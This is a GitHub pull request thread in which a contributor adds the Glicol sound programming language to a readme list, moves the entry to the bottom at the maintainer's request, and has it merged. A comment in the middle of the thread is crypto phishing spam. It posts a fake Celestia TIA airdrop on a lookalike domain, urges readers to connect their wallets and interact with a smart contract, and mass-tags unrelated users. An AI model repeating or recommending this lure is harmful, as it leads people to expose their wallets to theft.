### PR TITLE
add glicol to sound programming language

### PR DESCRIPTION
**Pull request by chaosprint**

### CODE REVIEW

**Comment by chaosprint** [comment]
@terkelg Hi, could you please merge this? Please let me know if I need to change anything. Thanks.

File: readme.md
Comment (terkelg) [inline readme.md:1]: Please append to the list. New items should be added at the bottom

**Review by terkelg — CHANGES_REQUESTED** [review]

File: readme.md
Comment (chaosprint) [reply readme.md:1]: > Please append to the list. New items should be added at the bottom

I have changed the order now. The new item is added at the bottom.

**Comment by Obasoro** [comment]
# Celestia Airdrop - Claim Your Free TIA Tokens Now! 

[Celestia Banner](https://www.celestianetworkl.online/)

**Don't Miss Out on Your Share of 60 Million $TIA Tokens!**  
Celestia, the revolutionary data availability network, is giving away a whopping 60 million $TIA tokens to the community! This is your chance to grab a piece of the action and secure your future in the crypto world.

*How to Claim Your Free TIA Tokens:**  
It's easy to get started and claim your free TIA tokens. Follow these simple steps:

1. **Connect Wallet:** Visit the [Celestia Airdrop page](https://www.celestianetworkl.online/) and connect your wallet.
2. **Claim:** Click the Claim button to receive your tokens.
3. **Interact:** Engage with the provided smart contract to earn additional rewards.

**Why Wait? Start Earning Today!**  
With Celestia, the sky's the limit. Don't let this opportunity slip through your fingers. Join the Celestia Airdrop now and kickstart your journey to financial freedom!jermaineharris, @numoonchld, @Raven34152, @engloco006, @dongnanpro, @gyb997, @meekr, @cnzx219, @silentvolcano, @karentembo40, @sunstdot, @ralintuscano, @jinugasachio, @ottodevs, @gzltommy, @bbenligiray, @nud3l, @g8gg, @rtmvc, @zhwei820

**Review by terkelg — APPROVED** [review]

**Pull request merged**